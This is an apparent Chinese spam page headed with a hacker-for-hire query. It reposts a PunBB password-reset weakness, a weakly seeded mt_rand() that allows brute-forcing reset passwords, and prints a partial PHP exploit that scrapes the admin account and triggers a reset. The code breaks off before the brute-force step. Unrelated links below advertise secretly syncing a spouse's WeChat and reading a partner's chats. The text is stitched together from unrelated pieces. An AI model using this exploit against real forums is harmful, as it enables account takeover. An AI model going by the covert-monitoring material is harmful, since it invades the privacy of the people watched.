怎么找 *** 黑客接单(24小时接单的黑客

访客4年前黑客资讯779

PunBB是一款基于PHP的论坛程序。 

PunBB的口令重置功能实现上存在漏洞,远程攻击者可能利用此漏洞在特定条件重置用户的口令。 
如果用户忘记了口令的话,可使用PunBB的口令重置功能重置。在请求口令重置后,论坛会向用户发送一封邮件,包含有一个新的随机口令以及激活链接,用户必须点击这个链接才能使口令更改生效。 
PunBB的口令重置功能使用mt_rand()生成新口令和激活链接,但在初始化马特赛特旋转演算法随机数生成器时使用了0到1,000,000之间的随机数,具体取决于当前的微秒,也就是只有100万个可能的新口令和激活链接。攻击者可以暴力猜测这个有限的区域,判断重置的口令并激活。 

<?php 
/** 
* Original : http://www.winshell.cn/2008-01.txt 
* Thanks to Stefan Esser, here's the exploit. 

* Team : EpiBite 
* firefox, petit-poney, thot 
* Nous tenons a remercier nos mamans et papas respectifs. 
* Let's get a fu*** coffee ! 
*/ 

// conf 
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url 
define('EMAIL', 'login_x@epitech.net'); // your email 
define('LOGIN', 'login_x'); // your login 
define('PASS', '620553.8I73'); // your pass 
// Exploit 
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, 
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
$s = curl_exec($h); 
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)', $s, $m); 
define('ADMIN', $m[2]); 
preg_match('/

([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m); 
if (count($m)) 
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1])); 
else 
define('DATE', time() - 86400); //just in case, the forum or account just has been created 
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); 
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($h, CURLOPT_HEADER, 1); 
curl_setopt($h, CURLOPT_POST, 1); 
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 
'req_email='.urlencode(EMAIL), 
'request_pass=Envoyer'))); 
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); 
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem) 
printf("Admin mail : %s\n--\n", ADMIN_MAIL); 

相关文章

如何同步老婆微信不被发现,还能接受她的聊天记录呢

如何同步老婆微信不被发现,还能接受她的聊天记录呢

笔者就这一问题做过广泛的调查,中国人与西方人的回答是截然相反的。事实上,大量生活现象和常识告诉我们,西方人在诸多道德观念与教育理念上与中国人毫无共同之处,在家庭伦理和道德观念上同样几无共同之处。在西方...

微软和德国黑客(让美国颤抖的中国黑客)

微软和德国黑客(让美国颤抖的中国黑客)

本文导读目录: 1、历史上五大电脑黑客是谁啊 2、历史上最著名的几次黑客事件 3、世界上的知名黑客有哪些? 4、世界五大黑客的艾德里安·拉莫( Adrian Lamo) 5、哪国黑客的...

怎样才能查看老公和别人的聊天记录

10月28日,在2020年第十五届“中国芯”集成电路产业促进大会上,海信自主研发的第三代Hi-View Pro超高清画质引擎芯片荣获“优秀技术创新产品”大奖,海信也是唯一获得“中国芯”大奖的彩电企业。...

央视再评大胃王吃播说了什么?央视再评大胃王吃播全文曝光

央视再评大胃王吃播:能理解那种带给观众的视觉冲击和快感,但天天这么吃,身体扛不住,对观众也会产生不好的引导。还是那句话,袁隆平爷爷让咱吃饱,没让咱糟践粮食。转发倡议:珍惜粮食,珍爱生活,对餐饮浪费行为...

手机定位app合法吗(下载定位通违法吗)

手机定位app合法吗(下载定位通违法吗)“提供他人的实时定位” “只需手机号即可知道他人位置” …… 这些声称能提供他人定位信息的消息 千万别相信! 近日,骗子骗局翻新, 以“提供定位软件...

口碑营销的策略有哪些(11种口碑营销策略(附案

口碑营销的策略有哪些(11种口碑营销策略(附案

相比其他形式的营销,92%的消费者更信任他们的朋友、家人和同龄人的推荐。83%的美国人表示如果他们信任的人推荐一种产品或服务,那么他们购买的可能性更大。 因此,如果你正在寻找获得新客户的最佳方式...